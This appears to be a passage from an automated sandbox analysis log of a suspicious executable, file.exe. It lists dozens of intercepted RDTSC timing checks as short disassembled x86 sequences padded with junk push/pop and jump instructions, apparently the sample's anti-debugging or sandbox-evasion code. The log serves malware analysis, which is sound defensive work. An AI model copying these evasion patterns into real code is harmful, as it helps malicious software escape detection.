              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93765E second address: 937683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FD979248A78h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937683 second address: 937688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937688 second address: 93768E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C54D second address: 93C577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FD978BA9B16h 0x0000000b jne 00007FD978BA9B16h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 jmp 00007FD978BA9B1Bh 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jnp 00007FD978BA9B1Eh 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7BE1 second address: 8D7BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C813 second address: 93C82A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jc 00007FD978BA9B28h 0x0000000f jne 00007FD978BA9B22h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CDA9 second address: 93CDAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CDAF second address: 93CDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jns 00007FD978BA9B16h 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CF0B second address: 93CF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CF0F second address: 93CF1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CF1B second address: 93CF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD979248A76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF45B second address: 8CF468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FD978BA9B22h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94056C second address: 940574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940574 second address: 940596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD978BA9B23h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007FD978BA9B1Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940596 second address: 9405AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FD979248A7Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E436 second address: 90E43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E583 second address: 90E589 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E947 second address: 75F7B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD978BA9B23h 0x00000008 jbe 00007FD978BA9B16h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push dword ptr [ebp+122D01C9h] 0x0000001a mov dword ptr [ebp+122D184Bh], ebx 0x00000020 call dword ptr [ebp+122D2CC3h] 0x00000026 pushad 0x00000027 xor dword ptr [ebp+122D1853h], ecx 0x0000002d xor eax, eax 0x0000002f jns 00007FD978BA9B1Eh 0x00000035 mov dword ptr [ebp+122D199Fh], esi 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f pushad 0x00000040 mov ch, dh 0x00000042 stc 0x00000043 popad 0x00000044 mov dword ptr [ebp+122D3405h], eax 0x0000004a or dword ptr [ebp+122D199Fh], edx 0x00000050 mov esi, 0000003Ch 0x00000055 stc 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a or dword ptr [ebp+122D199Fh], edx 0x00000060 lodsw 0x00000062 mov dword ptr [ebp+122D1863h], eax 0x00000068 ja 00007FD978BA9B2Ch 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jl 00007FD978BA9B22h 0x00000078 jnl 00007FD978BA9B1Ch 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 jl 00007FD978BA9B1Ch 0x00000088 sub dword ptr [ebp+122D18A4h], ecx 0x0000008e nop 0x0000008f pushad 0x00000090 jmp 00007FD978BA9B24h 0x00000095 jmp 00007FD978BA9B23h 0x0000009a popad 0x0000009b push eax 0x0000009c jns 00007FD978BA9B28h 0x000000a2 push eax 0x000000a3 push edx 0x000000a4 jng 00007FD978BA9B16h 0x000000aa rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EA0F second address: 90EA49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD979248A89h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD979248A88h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EAD8 second address: 90EAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD978BA9B16h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007FD978BA9B32h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EAEE second address: 90EAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EAF2 second address: 90EB27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FD978BA9B1Ah 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 pop edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EC16 second address: 90EC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EC99 second address: 90EC9F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EC9F second address: 90ECA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90ECA5 second address: 90ECCA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d push esi 0x0000000e mov dword ptr [ebp+122D1803h], esi 0x00000014 pop edx 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD978BA9B1Ch 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F669 second address: 90F66F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F75C second address: 90F76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD978BA9B1Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F76D second address: 90F771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F771 second address: 90F7D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FD978BA9B18h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 jno 00007FD978BA9B1Bh 0x0000002b lea eax, dword ptr [ebp+12482226h] 0x00000031 mov edx, ebx 0x00000033 nop 0x00000034 pushad 0x00000035 push ebx 0x00000036 jmp 00007FD978BA9B21h 0x0000003b pop ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FD978BA9B20h 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F7D9 second address: 90F7DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F7DD second address: 90F81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 popad 0x00000014 nop 0x00000015 lea eax, dword ptr [ebp+124821E2h] 0x0000001b and cx, E368h 0x00000020 nop 0x00000021 jmp 00007FD978BA9B28h 0x00000026 push eax 0x00000027 push esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F81C second address: 8F7C1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 mov ecx, dword ptr [ebp+122D2A3Ch] 0x0000000e call dword ptr [ebp+122D2211h] 0x00000014 pushad 0x00000015 push esi 0x00000016 jnp 00007FD979248A76h 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7C1B second address: 8F7C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7C1F second address: 8F7C2D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD979248A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7C2D second address: 8F7C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C354A second address: 8C354E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C354E second address: 8C355A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD978BA9B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9408A8 second address: 9408C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD979248A7Bh 0x0000000c jnp 00007FD979248A76h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940A68 second address: 940A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FD978BA9B28h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940BDE second address: 940C1A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD979248A76h 0x00000008 jmp 00007FD979248A7Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FD979248A7Ch 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD979248A88h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940E9B second address: 940E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940E9F second address: 940EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD979248A85h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941069 second address: 941081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD978BA9B24h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941081 second address: 941099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A82h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BD1B second address: 94BD25 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD978BA9B2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BD25 second address: 94BD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD979248A82h 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2AB5 second address: 8D2ABB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A9F2 second address: 94A9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB30 second address: 94AB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD978BA9B1Ah 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB45 second address: 94AB49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB49 second address: 94AB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB4F second address: 94AB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD979248A7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB67 second address: 94AB6D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A697 second address: 94A69D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A69D second address: 94A6CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FD978BA9B3Eh 0x00000012 jmp 00007FD978BA9B24h 0x00000017 pushad 0x00000018 jbe 00007FD978BA9B16h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B424 second address: 94B42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B42A second address: 94B453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD978BA9B22h 0x0000000a push edi 0x0000000b jc 00007FD978BA9B16h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD978BA9B16h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B453 second address: 94B457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B5C6 second address: 94B5E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B5E2 second address: 94B5FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A81h 0x00000007 push edx 0x00000008 jnp 00007FD979248A76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95157D second address: 951581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951581 second address: 951589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951589 second address: 9515AF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD978BA9B30h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9501BE second address: 9501CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979248A7Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950418 second address: 950438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007FD978BA9B18h 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950AC6 second address: 950AD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950AD8 second address: 950ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950ADD second address: 950AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950AE5 second address: 950AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950C37 second address: 950C57 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD979248A86h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954729 second address: 954753 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD978BA9B16h 0x00000008 ja 00007FD978BA9B16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FD978BA9B16h 0x00000018 jmp 00007FD978BA9B22h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954753 second address: 95477C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FD979248A78h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FD979248A76h 0x00000017 jmp 00007FD979248A82h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95477C second address: 954780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9567F7 second address: 9567FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9567FE second address: 956803 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956803 second address: 956844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FD979248A88h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FD979248AA8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD979248A84h 0x00000019 ja 00007FD979248A76h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95699B second address: 95699F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95699F second address: 9569AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FD979248A7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9569AD second address: 9569E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FD978BA9B24h 0x0000000a jl 00007FD978BA9B16h 0x00000010 pop eax 0x00000011 popad 0x00000012 jng 00007FD978BA9B28h 0x00000018 jl 00007FD978BA9B22h 0x0000001e jp 00007FD978BA9B16h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959C8A second address: 959C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959C8E second address: 959CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FD978BA9B1Eh 0x0000000e jo 00007FD978BA9B16h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FD978BA9B18h 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007FD978BA9B28h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959572 second address: 959576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959576 second address: 95957C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95957C second address: 95959E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD979248A88h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95959E second address: 9595A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95971B second address: 959725 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959725 second address: 959729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
